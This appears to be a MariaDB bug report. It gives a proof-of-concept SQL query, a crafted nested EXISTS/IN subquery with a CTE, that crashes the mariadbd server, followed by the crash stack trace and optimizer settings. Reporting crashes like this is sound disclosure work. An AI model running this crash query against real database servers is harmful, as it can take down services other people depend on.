Details
Major Description
PoC:
SELECT |
EXISTS (
|
WITH x ( x ) AS ( SELECT 1 ) |
SELECT NULL |
WHERE ( 1 , 1 ) = |
( SELECT |
1 , ( ( x , 1.000000 ) , 1 )
|
IN |
(SELECT 'x' , 'x' |
WHERE ( ( 'x' ) ) |
UNION |
SELECT 1 , x |
HAVING 1 != 1 |
)
|
FROM x |
)
|
);
|
docker log:
mariadbd(my_print_stacktrace+0x32)[0x55ab626be7c2]
|
mariadbd(handle_fatal_signal+0x488)[0x55ab62197cf8]
|
/lib/x86_64-linux-gnu/libc.so.6(+0x42520)[0x7fe667658520]
|
mariadbd(_ZN5TABLE11add_tmp_keyEjjPFjPhES0_b+0x1bc)[0x55ab620253ec]
|
mariadbd(_ZN25Expression_cache_tmptable4initEv+0x1d3)[0x55ab620a3a73]
|
mariadbd(_ZN18Item_cache_wrapper11check_cacheEv+0x21)[0x55ab621c4aa1]
|
mariadbd(_ZN18Item_cache_wrapper7val_intEv+0x21)[0x55ab621c4c31]
|
mariadbd(_ZN14Item_cache_int11cache_valueEv+0x29)[0x55ab621ad149]
|
mariadbd(_ZN26select_singlerow_subselect9send_dataER4ListI4ItemE+0x3f)[0x55ab61ec193f]
|
mariadbd(+0x89bf74)[0x55ab61f8df74]
|
mariadbd(_ZN4JOIN10exec_innerEv+0x1222)[0x55ab61fa6e12]
|
mariadbd(_ZN4JOIN4execEv+0x3f)[0x55ab61fa6fff]
|
mariadbd(_ZN30subselect_single_select_engine4execEv+0x146)[0x55ab622777f6]
|
mariadbd(_ZN14Item_subselect4execEv+0x4c)[0x55ab6227673c]
|
mariadbd(_ZN24Item_singlerow_subselect11bring_valueEv+0x17)[0x55ab62277ec7]
|
mariadbd(_ZN14Arg_comparator11compare_rowEv+0x37)[0x55ab621d1377]
|
mariadbd(_ZN12Item_func_eq7val_intEv+0x2f)[0x55ab621d164f]
|
mariadbd(_ZN4JOIN10exec_innerEv+0x432)[0x55ab61fa6022]
|
mariadbd(_ZN4JOIN4execEv+0x3f)[0x55ab61fa6fff]
|
mariadbd(_ZN30subselect_single_select_engine4execEv+0x146)[0x55ab622777f6]
|
mariadbd(_ZN14Item_subselect4execEv+0x4c)[0x55ab6227673c]
|
mariadbd(_ZN21Item_exists_subselect7val_intEv+0x23)[0x55ab622764a3]
|
mariadbd(_ZNK12Type_handler14Item_send_longEP4ItemP8ProtocolP8st_value+0x1d)[0x55ab620ee89d]
|
mariadbd(_ZN8Protocol19send_result_set_rowEP4ListI4ItemE+0xea)[0x55ab61e4ccfa]
|
mariadbd(_ZN11select_send9send_dataER4ListI4ItemE+0x37)[0x55ab61ecb6a7]
|
mariadbd(_ZN4JOIN10exec_innerEv+0xc90)[0x55ab61fa6880]
|
mariadbd(_ZN4JOIN4execEv+0x3f)[0x55ab61fa6fff]
|
mariadbd(_Z12mysql_selectP3THDP10TABLE_LISTR4ListI4ItemEPS4_jP8st_orderS9_S7_S9_yP13select_resultP18st_select_lex_unitP13st_select_lex+0x12c)[0x55ab61fa4f7c]
|
mariadbd(_Z13handle_selectP3THDP3LEXP13select_resulty+0x154)[0x55ab61fa5774]
|
mariadbd(+0x826f55)[0x55ab61f18f55]
|
mariadbd(_Z21mysql_execute_commandP3THDb+0x419e)[0x55ab61f27f0e]
|
mariadbd(_Z11mysql_parseP3THDPcjP12Parser_state+0x1e7)[0x55ab61f29237]
|
mariadbd(_Z16dispatch_command19enum_server_commandP3THDPcjb+0x14bd)[0x55ab61f2ba1d]
|
mariadbd(_Z10do_commandP3THDb+0x138)[0x55ab61f2d818]
|
mariadbd(_Z24do_handle_one_connectionP7CONNECTb+0x3bf)[0x55ab620553af]
|
mariadbd(handle_one_connection+0x5d)[0x55ab620556fd]
|
mariadbd(+0xcd1906)[0x55ab623c3906]
|
/lib/x86_64-linux-gnu/libc.so.6(+0x94b43)[0x7fe6676aab43]
|
/lib/x86_64-linux-gnu/libc.so.6(clone+0x44)[0x7fe66773bbb4]
|
 |
Trying to get some variables.
|
Some pointers may be invalid and cause the dump to abort.
|
Query (0x7fe5f80130d8): SELECT EXISTS ( WITH x ( x ) AS ( SELECT 1 ) SELECT NULL WHERE ( 1 , 1 ) = ( SELECT 1 , ( ( x , 1.000000 ) , 1 ) IN ( SELECT 'x' , 'x' WHERE ( ( 'x' ) ) UNION SELECT 1 , x HAVING 1 != 1 ) FROM x ) )
|
 |
Connection ID (thread ID): 4
|
Status: NOT_KILLED
|
 |
Optimizer switch: index_merge=on,index_merge_union=on,index_merge_sort_union=on,index_merge_intersection=on,index_merge_sort_intersection=off,engine_condition_pushdown=off,index_condition_pushdown=on,derived_merge=on,derived_with_keys=on,firstmatch=on,loosescan=on,materialization=on,in_to_exists=on,semijoin=on,partial_match_rowid_merge=on,partial_match_table_scan=on,subquery_cache=on,mrr=off,mrr_cost_based=off,mrr_sort_keys=off,outer_join_with_cache=on,semijoin_with_cache=on,join_cache_incremental=on,join_cache_hashed=on,join_cache_bka=on,optimize_join_buffer_size=on,table_elimination=on,extended_keys=on,exists_to_in=on,orderby_uses_equalities=on,condition_pushdown_for_derived=on,split_materialized=on,condition_pushdown_for_subquery=on,rowid_filter=on,condition_pushdown_from_having=on,not_null_range_scan=off,hash_join_cardinality=on
|